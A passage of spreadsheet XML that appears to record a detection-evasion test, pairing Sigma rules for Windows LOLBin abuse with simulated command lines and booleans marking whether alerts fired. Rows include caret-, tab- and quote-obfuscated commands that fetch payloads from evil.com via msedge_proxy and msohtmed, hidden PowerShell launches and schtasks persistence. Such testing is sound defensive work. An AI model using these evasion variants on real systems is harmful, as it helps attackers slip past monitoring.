    <row r="4640" ht="15.75" customHeight="1" s="42">
      <c r="A4640" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4640" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4640" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4640" s="44" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4640" s="44" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\cmd.exe /c powershell.exe -nop -w hidden -command "New-Item -ItemType File C:\\art-marker.txt"</t>
        </is>
      </c>
      <c r="F4640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4640" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4640" s="44" t="n"/>
      <c r="J4640" s="44" t="n"/>
      <c r="K4640" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4641" ht="15.75" customHeight="1" s="42">
      <c r="A4641" s="44" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B4641" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_parent_process</t>
        </is>
      </c>
      <c r="C4641" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parent Process</t>
        </is>
      </c>
      <c r="D4641" s="44" t="inlineStr">
        <is>
          <t>754ed792-634f-40ae-b3bc-e0448d33f695</t>
        </is>
      </c>
      <c r="E4641" s="44" t="inlineStr">
        <is>
          <t>C:\\WINDOWS\\system32\\cmd.exe /c powershell -nop -w hidden -command New-Item -ItemType File C:\\art-marker.txt</t>
        </is>
      </c>
      <c r="F4641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4641" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4641" s="44" t="n"/>
      <c r="J4641" s="44" t="n"/>
      <c r="K4641" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4642" ht="15.75" customHeight="1" s="42">
      <c r="A4642" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B4642" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_schtasks_env_folder</t>
        </is>
      </c>
      <c r="C4642" s="44" t="inlineStr">
        <is>
          <t>Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE</t>
        </is>
      </c>
      <c r="D4642" s="44" t="inlineStr">
        <is>
          <t>81325ce1-be01-4250-944f-b4789644556f</t>
        </is>
      </c>
      <c r="E4642" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -create /tn "TestTask1" /tr "C:\Perflogs\test.txt" /sc daily</t>
        </is>
      </c>
      <c r="F4642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4642" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I4642" s="44" t="n"/>
      <c r="J4642" s="44" t="n"/>
      <c r="K4642" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="4643" ht="15.75" customHeight="1" s="42">
      <c r="A4643" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4643" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C4643" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D4643" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E4643" s="44" t="inlineStr">
        <is>
          <t>devinit.exe -t msi-install -i "http"://example.com/package.msi</t>
        </is>
      </c>
      <c r="F4643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4643" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4643" s="44" t="n"/>
      <c r="J4643" s="44" t="n"/>
      <c r="K4643" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4644" ht="15.75" customHeight="1" s="42">
      <c r="A4644" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4644" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C4644" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D4644" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E4644" s="44" t="inlineStr">
        <is>
          <t>devinit.exe "-t" msi-install "-i" http://example.com/package.msi</t>
        </is>
      </c>
      <c r="F4644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4644" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4644" s="44" t="n"/>
      <c r="J4644" s="44" t="n"/>
      <c r="K4644" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4645" ht="15.75" customHeight="1" s="42">
      <c r="A4645" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4645" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_devinit_lolbin_usage</t>
        </is>
      </c>
      <c r="C4645" s="44" t="inlineStr">
        <is>
          <t>Arbitrary MSI Download Via Devinit.EXE</t>
        </is>
      </c>
      <c r="D4645" s="44" t="inlineStr">
        <is>
          <t>90d50722-0483-4065-8e35-57efaadd354d</t>
        </is>
      </c>
      <c r="E4645" s="44" t="inlineStr">
        <is>
          <t>devinit.exe	-t	msi-install	-i	http://example.com/package.msi</t>
        </is>
      </c>
      <c r="F4645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4645" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4645" s="44" t="n"/>
      <c r="J4645" s="44" t="n"/>
      <c r="K4645" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4646" ht="15.75" customHeight="1" s="42">
      <c r="A4646" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4646" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C4646" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D4646" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E4646" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe collect --	calc.exe</t>
        </is>
      </c>
      <c r="F4646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4646" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4646" s="44" t="n"/>
      <c r="J4646" s="44" t="n"/>
      <c r="K4646" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4647" ht="15.75" customHeight="1" s="42">
      <c r="A4647" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4647" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C4647" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D4647" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E4647" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe "collect" -- calc.exe</t>
        </is>
      </c>
      <c r="F4647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4647" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4647" s="44" t="n"/>
      <c r="J4647" s="44" t="n"/>
      <c r="K4647" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4648" ht="15.75" customHeight="1" s="42">
      <c r="A4648" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4648" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C4648" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D4648" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E4648" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c dotnet-trace.exe col^lect -- calc.exe</t>
        </is>
      </c>
      <c r="F4648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4648" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4648" s="44" t="n"/>
      <c r="J4648" s="44" t="n"/>
      <c r="K4648" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4649" ht="15.75" customHeight="1" s="42">
      <c r="A4649" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4649" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_dotnet_trace_lolbin_execution</t>
        </is>
      </c>
      <c r="C4649" s="44" t="inlineStr">
        <is>
          <t>Binary Proxy Execution Via Dotnet-Trace.EXE</t>
        </is>
      </c>
      <c r="D4649" s="44" t="inlineStr">
        <is>
          <t>9257c05b-4a4a-48e5-a670-b7b073cf401b</t>
        </is>
      </c>
      <c r="E4649" s="44" t="inlineStr">
        <is>
          <t>dotnet-trace.exe -- calc.exe collect</t>
        </is>
      </c>
      <c r="F4649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4649" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4649" s="44" t="n"/>
      <c r="J4649" s="44" t="n"/>
      <c r="K4649" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4650" ht="15.75" customHeight="1" s="42">
      <c r="A4650" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4650" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C4650" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D4650" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E4650" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml"</t>
        </is>
      </c>
      <c r="F4650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4650" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4650" s="44" t="n"/>
      <c r="J4650" s="44" t="n"/>
      <c r="K4650" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4651" ht="15.75" customHeight="1" s="42">
      <c r="A4651" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4651" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C4651" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D4651" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E4651" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" http^s://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F4651" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4651" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4651" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE (863218bd-c7d0-4c52-80cd-0a96c09f54af)</t>
        </is>
      </c>
      <c r="J4651" s="44" t="n"/>
      <c r="K4651" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4652" ht="15.75" customHeight="1" s="42">
      <c r="A4652" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4652" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C4652" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D4652" s="44" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E4652" s="44" t="inlineStr">
        <is>
          <t>"C:\WINDOWS\System32\IME\SHARED\IMEWDBLD.exe" hwtwtwpts://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml</t>
        </is>
      </c>
      <c r="F4652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4652" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4652" s="44" t="n"/>
      <c r="J4652" s="44" t="n"/>
      <c r="K4652" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4653" ht="15.75" customHeight="1" s="42">
      <c r="A4653" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4653" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C4653" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D4653" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E4653" s="44" t="inlineStr">
        <is>
          <t>mpiexec.exe "-n" 1 calc.exe</t>
        </is>
      </c>
      <c r="F4653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4653" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4653" s="44" t="n"/>
      <c r="J4653" s="44" t="n"/>
      <c r="K4653" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4654" ht="15.75" customHeight="1" s="42">
      <c r="A4654" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4654" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C4654" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D4654" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E4654" s="44" t="inlineStr">
        <is>
          <t>mpiexec.exe -n "1" calc.exe</t>
        </is>
      </c>
      <c r="F4654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4654" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4654" s="44" t="n"/>
      <c r="J4654" s="44" t="n"/>
      <c r="K4654" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4655" ht="15.75" customHeight="1" s="42">
      <c r="A4655" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4655" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C4655" s="44" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D4655" s="44" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E4655" s="44" t="inlineStr">
        <is>
          <t>mpiexec.exe  -n  1  calc.exe</t>
        </is>
      </c>
      <c r="F4655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4655" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4655" s="44" t="n"/>
      <c r="J4655" s="44" t="n"/>
      <c r="K4655" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4656" ht="15.75" customHeight="1" s="42">
      <c r="A4656" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4656" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_msdt_answer_file</t>
        </is>
      </c>
      <c r="C4656" s="44" t="inlineStr">
        <is>
          <t>Execute MSDT Via Answer File</t>
        </is>
      </c>
      <c r="D4656" s="44" t="inlineStr">
        <is>
          <t>9c8c7000-3065-44a8-a555-79bcba5d9955</t>
        </is>
      </c>
      <c r="E4656" s="44" t="inlineStr">
        <is>
          <t>A generated simulated command line. Use an empty string only when no safe command can be generated.</t>
        </is>
      </c>
      <c r="F4656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4656" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4656" s="44" t="n"/>
      <c r="J4656" s="44" t="n"/>
      <c r="K4656" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4657" ht="15.75" customHeight="1" s="42">
      <c r="A4657" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4657" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C4657" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D4657" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E4657" s="44" t="inlineStr">
        <is>
          <t>pcwrun.exe ..\..\Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F4657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4657" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4657" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4657" s="44" t="inlineStr">
        <is>
          <t>Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J4657" s="44" t="n"/>
      <c r="K4657" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4658" ht="15.75" customHeight="1" s="42">
      <c r="A4658" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4658" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C4658" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D4658" s="44" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E4658" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c pcwrun.exe ..^/^./Windows\System32\calc.exe</t>
        </is>
      </c>
      <c r="F4658" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4658" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4658" s="44" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina (6004abd0-afa4-4557-ba90-49d172e0a299)</t>
        </is>
      </c>
      <c r="J4658" s="44" t="n"/>
      <c r="K4658" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4659" ht="15.75" customHeight="1" s="42">
      <c r="A4659" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4659" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C4659" s="44" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D4659" s="44" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E4659" s="44" t="inlineStr">
        <is>
          <t>ScriptRunner.exe "-appvscript" C:\Windows\Temp\test.cmd</t>
        </is>
      </c>
      <c r="F4659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4659" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4659" s="44" t="n"/>
      <c r="J4659" s="44" t="n"/>
      <c r="K4659" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4660" ht="15.75" customHeight="1" s="42">
      <c r="A4660" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4660" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C4660" s="44" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D4660" s="44" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E4660" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c ScriptRunner.exe -appv^script C:\Windows\Temp\test.cmd</t>
        </is>
      </c>
      <c r="F4660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4660" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4660" s="44" t="n"/>
      <c r="J4660" s="44" t="n"/>
      <c r="K4660" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4661" ht="15.75" customHeight="1" s="42">
      <c r="A4661" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4661" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C4661" s="44" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D4661" s="44" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E4661" s="44" t="inlineStr">
        <is>
          <t>ScriptRunner.exe /appvscript C:\Windows\Temp\test.cmd</t>
        </is>
      </c>
      <c r="F4661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4661" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4661" s="44" t="n"/>
      <c r="J4661" s="44" t="n"/>
      <c r="K4661" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4662" ht="15.75" customHeight="1" s="42">
      <c r="A4662" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4662" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C4662" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D4662" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E4662" s="44" t="inlineStr">
        <is>
          <t>sftp.exe "-D" ..\..\..\Windows\System32\calc.exe user@host</t>
        </is>
      </c>
      <c r="F4662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4662" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H4662" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4662" s="44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J4662" s="44" t="n"/>
      <c r="K4662" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4663" ht="15.75" customHeight="1" s="42">
      <c r="A4663" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4663" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_sftp</t>
        </is>
      </c>
      <c r="C4663" s="44" t="inlineStr">
        <is>
          <t>Use Of The SFTP.EXE Binary As A LOLBIN</t>
        </is>
      </c>
      <c r="D4663" s="44" t="inlineStr">
        <is>
          <t>a85ffc3a-e8fd-4040-93bf-78aff284d801</t>
        </is>
      </c>
      <c r="E4663" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c sftp.exe -^D ..\..\..\Windows\System32\calc.exe user@host</t>
        </is>
      </c>
      <c r="F4663" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G4663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4663" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4663" s="44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J4663" s="44" t="n"/>
      <c r="K4663" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4664" ht="15.75" customHeight="1" s="42">
      <c r="A4664" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4664" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C4664" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D4664" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E4664" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server "https://evil.com/payload.exe"</t>
        </is>
      </c>
      <c r="F4664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4664" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4664" s="44" t="n"/>
      <c r="J4664" s="44" t="n"/>
      <c r="K4664" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4665" ht="15.75" customHeight="1" s="42">
      <c r="A4665" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4665" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C4665" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D4665" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E4665" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server https:\\evil.com\payload.exe</t>
        </is>
      </c>
      <c r="F4665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4665" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4665" s="44" t="n"/>
      <c r="J4665" s="44" t="n"/>
      <c r="K4665" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4666" ht="15.75" customHeight="1" s="42">
      <c r="A4666" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4666" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msedge_proxy_download</t>
        </is>
      </c>
      <c r="C4666" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSEDGE_PROXY.EXE</t>
        </is>
      </c>
      <c r="D4666" s="44" t="inlineStr">
        <is>
          <t>e84d89c4-f544-41ca-a6af-4b92fd38b023</t>
        </is>
      </c>
      <c r="E4666" s="44" t="inlineStr">
        <is>
          <t>msedge_proxy.exe --no-proxy-server h	t	t	p	s	:	/	/	evil.com/payload.exe</t>
        </is>
      </c>
      <c r="F4666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4666" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I4666" s="44" t="n"/>
      <c r="J4666" s="44" t="n"/>
      <c r="K4666" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="4667" ht="15.75" customHeight="1" s="42">
      <c r="A4667" s="44" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B4667" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_msohtmed_download</t>
        </is>
      </c>
      <c r="C4667" s="44" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via MSOHTMED.EXE</t>
        </is>
      </c>
      <c r="D4667" s="44" t="inlineStr">
        <is>
          <t>459f2f98-397b-4a4a-9f47-6a5ec2f1c69d</t>
        </is>
      </c>
      <c r="E4667" s="44" t="inlineStr">
        <is>
          <t>msohtmed.exe	https://evil.com/payload.html</t>
        </is>
      </c>
      <c r="F4667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G4667" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H4667" s="44" t="b">
        <v>0</v>
      </c>
